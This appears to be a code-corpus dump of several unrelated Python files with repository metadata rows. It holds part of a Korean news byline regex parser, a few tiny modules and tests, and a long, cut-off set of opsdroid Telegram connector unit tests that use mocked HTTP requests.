, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경기일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
"=([가-힣]{2,4})\\s?기자",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "강원일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
"=([가-힣]{2,4})\\s?기자",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "강원도민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
, "강릉본부장"
]
forceList = [
"([가-힣]{2,4})",
"([가-힣]{2,4})\\s?email",
]
LastExcept = [
"명단", "kado", "첨부파일", "net", "프로필", "관련기사", "▶", "◇"
]
selfPattern = [
"=\\s?([가-힣]{2,4})\\s?기자$",
"([가-힣]{2,4})\\s?email$",
"정리/([가-힣]{2,4})",
"정리:\\s?([가-힣]{2,4})",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, FindForceLast=True,
backContent=False,
ForceList=forceList, LastExcept=LastExcept)
# 중앙일보
# 중앙일보
# 아시아경제
# 중앙일보
# 중앙일보
# 전북도민일보
# 중앙일보
# 영남일보 | 50.342508 | 106 | 0.484206 | 3,396 | 32,924 | 4.693757 | 0.064782 | 0.015809 | 0.023714 | 0.031619 | 0.93005 | 0.9234 | 0.920389 | 0.917189 | 0.9 | 0.887265 | 0 | 0.016328 | 0.289424 | 32,924 | 654 | 107 | 50.342508 | 0.664928 | 0.056767 | 0 | 0.59962 | 0 | 0.003795 | 0.321661 | 0.046957 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001898 | false | 0 | 0.001898 | 0 | 0.106262 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
156ab5d4fc44d11dd58bdfae2b07140b6f0d6c4d | 79 | py | Python | Backend/schemas/empty.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 3 | 2019-10-19T11:24:50.000Z | 2021-01-29T12:02:17.000Z | Backend/schemas/empty.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 29 | 2019-10-14T12:26:10.000Z | 2021-07-28T20:50:29.000Z | Backend/schemas/empty.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 2 | 2019-10-13T17:11:09.000Z | 2020-05-13T15:29:04.000Z | from pydantic import BaseModel
class EmptyResponseModel(BaseModel):
pass
| 13.166667 | 36 | 0.797468 | 8 | 79 | 7.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164557 | 79 | 5 | 37 | 15.8 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
157a16e31bd5a4a9b1a743753a069ab7fd649d2c | 115 | py | Python | tests/test_list_export.py | marteinn/The-Big-Username-Blacklist-Pymodule | 551b030f5a93c079d70100222332a3f82c50e170 | [
"MIT"
] | 3 | 2015-11-28T09:40:37.000Z | 2020-10-22T02:10:11.000Z | tests/test_list_export.py | marteinn/The-Big-Username-Blacklist-Pymodule | 551b030f5a93c079d70100222332a3f82c50e170 | [
"MIT"
] | 2 | 2015-08-27T06:56:54.000Z | 2018-12-09T11:42:23.000Z | tests/test_list_export.py | marteinn/The-Big-Username-Blacklist-Pymodule | 551b030f5a93c079d70100222332a3f82c50e170 | [
"MIT"
] | 2 | 2017-09-21T03:17:30.000Z | 2018-05-25T13:04:31.000Z | from the_big_username_blacklist import get_blacklist
def test_list_export():
assert "you" in get_blacklist()
| 19.166667 | 52 | 0.8 | 17 | 115 | 5 | 0.823529 | 0.282353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13913 | 115 | 5 | 53 | 23 | 0.858586 | 0 | 0 | 0 | 0 | 0 | 0.026087 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ec6caccbf2562589008645590afbb8544ff3563c | 129 | py | Python | 2020/j1.py | jo3-l/ccc | 65a26a28d8d4189ec9b6bed7682612f3ef7a245c | [
"MIT"
] | null | null | null | 2020/j1.py | jo3-l/ccc | 65a26a28d8d4189ec9b6bed7682612f3ef7a245c | [
"MIT"
] | 1 | 2021-01-22T19:11:52.000Z | 2021-01-22T19:16:28.000Z | 2020/j1.py | jo3-l/ccc | 65a26a28d8d4189ec9b6bed7682612f3ef7a245c | [
"MIT"
] | null | null | null | s, m, l = int(input()), int(input()), int(input())
if (1 * s + 2 * m + 3 * l) >= 10:
print("happy")
else:
print("sad")
| 16.125 | 50 | 0.457364 | 22 | 129 | 2.681818 | 0.636364 | 0.40678 | 0.372881 | 0.542373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.263566 | 129 | 7 | 51 | 18.428571 | 0.568421 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ec82c230d36d593f476c4a0849904d337ba49cb0 | 111 | py | Python | tests/test_dfs_spatial_axis.py | DHI/mikecore-python | 04c36b1ee3dc6c81905d75ff8c39d7b8a8411bd7 | [
"BSD-3-Clause"
] | 2 | 2021-06-01T21:06:48.000Z | 2021-06-16T03:49:35.000Z | tests/test_dfs_spatial_axis.py | DHI/mikecore-python | 04c36b1ee3dc6c81905d75ff8c39d7b8a8411bd7 | [
"BSD-3-Clause"
] | 6 | 2021-05-27T10:26:13.000Z | 2022-03-07T09:44:19.000Z | tests/test_dfs_spatial_axis.py | DHI/mikecore-python | 04c36b1ee3dc6c81905d75ff8c39d7b8a8411bd7 | [
"BSD-3-Clause"
] | null | null | null | from mikecore.DfsFileFactory import DfsFileFactory
from mikecore.DfsFile import *
from numpy.testing import *
| 22.2 | 50 | 0.837838 | 13 | 111 | 7.153846 | 0.538462 | 0.258065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117117 | 111 | 4 | 51 | 27.75 | 0.94898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bf15515beb11f720a4a683d884f8e1fbe3df4325 | 30,168 | py | Python | opsdroid/connector/telegram/tests/test_connector_telegram.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 712 | 2016-08-09T21:30:07.000Z | 2022-03-24T09:38:21.000Z | opsdroid/connector/telegram/tests/test_connector_telegram.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 1,767 | 2016-07-27T13:01:25.000Z | 2022-03-29T04:25:10.000Z | opsdroid/connector/telegram/tests/test_connector_telegram.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 536 | 2016-07-31T14:23:41.000Z | 2022-03-22T17:35:15.000Z | import logging
import asyncio
import pytest
import asynctest.mock as amock
from opsdroid.connector.telegram import ConnectorTelegram
import opsdroid.connector.telegram.events as telegram_events
import opsdroid.events as opsdroid_events
connector_config = {
"token": "test:token",
}
def test_init_no_base_url(opsdroid, caplog):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
caplog.set_level(logging.ERROR)
assert connector.name == "telegram"
assert connector.token == "test:token"
assert connector.whitelisted_users is None
assert connector.webhook_secret is not None
assert connector.base_url is None
assert "Breaking changes introduced" in caplog.text
def test_init(opsdroid):
config = {
"token": "test:token",
"whitelisted-users": ["bob", 1234],
"bot-name": "bot McBotty",
}
connector = ConnectorTelegram(config, opsdroid=opsdroid)
opsdroid.config["web"] = {"base-url": "https://test.com"}
assert connector.name == "telegram"
assert connector.token == "test:token"
assert connector.whitelisted_users == ["bob", 1234]
assert connector.bot_name == "bot McBotty"
assert connector.webhook_secret is not None
def test_get_user_from_channel_with_signature(opsdroid):
response = {
"update_id": 639974076,
"channel_post": {
"message_id": 15,
"author_signature": "Fabio Rosado",
"chat": {"id": -1001474700000, "title": "Opsdroid-test", "type": "channel"},
"date": 1603827365,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "")
assert user == "Fabio Rosado"
assert user_id == 15
def test_get_user_from_channel_without_signature(opsdroid):
response = {
"update_id": 639974076,
"channel_post": {
"message_id": 16,
"chat": {"id": -1001474700000, "title": "Opsdroid-test", "type": "channel"},
"date": 1603827365,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "Opsdroid!")
assert user == "Opsdroid!"
assert user_id == 16
def test_get_user_from_forwarded_message(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "first_name": "Telegram"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"forward_from_chat": {
"id": -10014740000,
"title": "Opsdroid-test",
"type": "channel",
},
"forward_from_message_id": 15,
"forward_signature": "Fabio Rosado",
"forward_date": 1603827365,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "Opsdroid!")
assert user == "Fabio Rosado"
assert user_id == 100000
def test_get_user_from_first_name(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "first_name": "Fabio"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "")
assert user == "Fabio"
assert user_id == 100000
def test_get_user_from_username(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "")
assert user == "FabioRosado"
assert user_id == 100000
def test_handle_user_permission(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = ["FabioRosado"]
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
permission = connector.handle_user_permission(response, "FabioRosado", 100000)
assert permission is True
def test_handle_user_id_permission(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = [100000]
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
permission = connector.handle_user_permission(response, "FabioRosado", 100000)
assert permission is True
def test_handle_user_no_permission(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = [1, "AllowedUser"]
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
permission = connector.handle_user_permission(response, "FabioRosado", 100000)
assert permission is False
def test_build_url(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
url = connector.build_url("getUpdates")
assert url == "https://api.telegram.org/bottest:token/getUpdates"
@pytest.mark.asyncio
async def test_connect(opsdroid):
opsdroid.config["web"] = {"base-url": "https://test.com"}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
connector.webhook_secret = "test_secret"
opsdroid.web_server = amock.Mock()
response = amock.Mock()
response.status = 200
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await connector.connect()
assert opsdroid.web_server.web_app.router.add_post.called
assert patched_request is not None
assert mocked_build_url.called
@pytest.mark.asyncio
async def test_connect_failure(opsdroid, caplog):
caplog.set_level(logging.ERROR)
opsdroid.config["web"] = {"base-url": "https://test.com"}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
connector.webhook_secret = "test_secret"
opsdroid.web_server = amock.Mock()
response = amock.Mock()
response.status = 404
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await connector.connect()
assert opsdroid.web_server.web_app.router.add_post.called
assert patched_request is not None
assert mocked_build_url.called
assert "Error when connecting to Telegram" in caplog.text
@pytest.mark.asyncio
async def test_respond(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
response = amock.Mock()
response.status = 200
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
assert opsdroid.__class__.instances
test_message = opsdroid_events.Message(
text="This is a test",
user="opsdroid",
target={"id": 12404},
connector=connector,
)
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await test_message.respond("Response")
assert patched_request.called
assert mocked_build_url.called
assert "Responding" in caplog.text
assert "Successfully responded" in caplog.text
@pytest.mark.asyncio
async def test_respond_failure(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
response = amock.Mock()
response.status = 500
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
assert opsdroid.__class__.instances
test_message = opsdroid_events.Message(
text="This is a test",
user="opsdroid",
target={"id": 12404},
connector=connector,
)
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await test_message.respond("Response")
assert patched_request.called
assert mocked_build_url.called
assert "Responding" in caplog.text
assert "Unable to respond" in caplog.text
@pytest.mark.asyncio
async def test_respond_image(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
post_response = amock.Mock()
post_response.status = 200
gif_bytes = (
b"GIF89a\x01\x00\x01\x00\x00\xff\x00,"
b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x00;"
)
image = opsdroid_events.Image(file_bytes=gif_bytes, target={"id": "123"})
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(post_response)
await connector.send_image(image)
assert mocked_build_url.called
assert patched_request.called
assert "Sent" in caplog.text
@pytest.mark.asyncio
async def test_respond_image_failure(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
post_response = amock.Mock()
post_response.status = 400
gif_bytes = (
b"GIF89a\x01\x00\x01\x00\x00\xff\x00,"
b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x00;"
)
image = opsdroid_events.Image(file_bytes=gif_bytes, target={"id": "123"})
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(post_response)
await connector.send_image(image)
assert mocked_build_url.called
assert patched_request.called
assert "Unable to send image" in caplog.text
@pytest.mark.asyncio
async def test_respond_file(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
post_response = amock.Mock()
post_response.status = 200
file_bytes = b"plain text file example"
file = opsdroid_events.File(file_bytes=file_bytes, target={"id": "123"})
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(post_response)
await connector.send_file(file)
assert mocked_build_url.called
assert patched_request.called
assert "Sent" in caplog.text
async def test_respond_file_failure(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
post_response = amock.Mock()
post_response.status = 400
file_bytes = b"plain text file example"
file = opsdroid_events.File(file_bytes=file_bytes, target={"id": "123"})
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(post_response)
await connector.send_file(file)
assert mocked_build_url.called
assert patched_request.called
assert "Unable to send file" in caplog.text
async def test_disconnect_successful(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
response = amock.Mock()
response.status = 200
with amock.patch(
"aiohttp.ClientSession.get", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await connector.disconnect()
assert mocked_build_url.called
assert patched_request.called
assert "Sending deleteWebhook" in caplog.text
assert "Telegram webhook deleted" in caplog.text
async def test_disconnect_failure(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
response = amock.Mock()
response.status = 400
with amock.patch(
"aiohttp.ClientSession.get", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await connector.disconnect()
assert mocked_build_url.called
assert patched_request.called
assert "Sending deleteWebhook" in caplog.text
assert "Unable to delete webhook" in caplog.text
@pytest.mark.asyncio
async def test_edited_message_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974040,
"edited_message": {
"message_id": 1247,
"from": {
"id": 6399348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 6399348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603818326,
"edit_date": 1603818330,
"text": "hi",
},
}
edited_message = opsdroid_events.EditedMessage("hi", 6399348, "Fabio", 6399348)
await connector.telegram_webhook_handler(mock_request)
assert "hi" in edited_message.text
assert "Fabio" in edited_message.user
assert edited_message.target == 6399348
assert edited_message.user_id == 6399348
@pytest.mark.asyncio
async def test_join_group_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974040,
"message": {
"message_id": 1247,
"from": {
"id": 6399348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 6399348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603818326,
"edit_date": 1603818330,
"new_chat_member": True,
},
}
join_message = opsdroid_events.JoinGroup(6399348, "Fabio", 6399348)
await connector.telegram_webhook_handler(mock_request)
assert "Fabio" in join_message.user
assert join_message.target == 6399348
assert join_message.user_id == 6399348
@pytest.mark.asyncio
async def test_leave_group_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974040,
"message": {
"message_id": 1247,
"from": {
"id": 6399348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 6399348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603818326,
"edit_date": 1603818330,
"left_chat_member": True,
},
}
left_message = opsdroid_events.LeaveGroup(6399348, "Fabio", 6399348)
await connector.telegram_webhook_handler(mock_request)
assert "Fabio" in left_message.user
assert left_message.target == 6399348
assert left_message.user_id == 6399348
@pytest.mark.asyncio
async def test_pinned_message_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974040,
"message": {
"message_id": 1247,
"from": {
"id": 6399348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 6399348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603818326,
"edit_date": 1603818330,
"pinned_message": True,
},
}
pinned_message = opsdroid_events.PinMessage(6399348, "Fabio", 6399348)
await connector.telegram_webhook_handler(mock_request)
assert "Fabio" in pinned_message.user
assert pinned_message.target == 6399348
assert pinned_message.user_id == 6399348
@pytest.mark.asyncio
async def test_reply_to_message_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974084,
"message": {
"message_id": 1272,
"from": {
"id": 639348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 639348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603834922,
"reply_to_message": {
"message_id": 1271,
"from": {
"id": 639348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 63948,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1603834912,
"text": "Hi",
},
"text": "This is a reply",
},
}
reply_message = opsdroid_events.Reply(
"This is a reply", 639348, "FabioRosado", 63948
)
await connector.telegram_webhook_handler(mock_request)
assert "This is a reply" in reply_message.text
assert "FabioRosado" in reply_message.user
assert reply_message.target == 63948
@pytest.mark.asyncio
async def test_location_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974101,
"message": {
"message_id": 42,
"from": {
"id": 1087968824,
"is_bot": True,
"first_name": "Group",
"username": "GroupAnonymousBot",
},
"chat": {
"id": -1001417735217,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603992829,
"location": {"latitude": 56.159849, "longitude": -5.230604},
},
}
event_location = telegram_events.Location(
{"location": {"latitude": 56.159849, "longitude": -5.230604}},
56.159849,
-5.230604,
)
await connector.telegram_webhook_handler(mock_request)
assert event_location.latitude == 56.159849
assert event_location.longitude == -5.230604
@pytest.mark.asyncio
async def test_poll_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974103,
"message": {
"message_id": 44,
"from": {
"id": 1087968824,
"is_bot": True,
"first_name": "Group",
"username": "GroupAnonymousBot",
},
"chat": {
"id": -1001417735217,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603993170,
"poll": {
"id": "5825895662671101957",
"question": "Test",
"options": [
{"text": "Test", "voter_count": 0},
{"text": "Testing", "voter_count": 0},
],
"total_voter_count": 0,
"is_closed": False,
"is_anonymous": True,
"type": "regular",
"allows_multiple_answers": False,
},
},
}
poll_event = telegram_events.Poll(
{
"question": "question",
"option": ["option1", "option2"],
"total_voter_count": 1,
},
"question",
["option1", "option2"],
1,
)
await connector.telegram_webhook_handler(mock_request)
assert poll_event.question == "question"
assert poll_event.options == ["option1", "option2"]
assert poll_event.total_votes == 1
@pytest.mark.asyncio
async def test_contact_event(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 1,
"message": {
"chat": {"id": 321},
"from": {"id": 123},
"contact": {"phone_number": 123456, "first_name": "opsdroid"},
},
}
contact_event = telegram_events.Contact(
{"phone_number": 123456, "first_name": "opsdroid"}, 123456, "opsdroid"
)
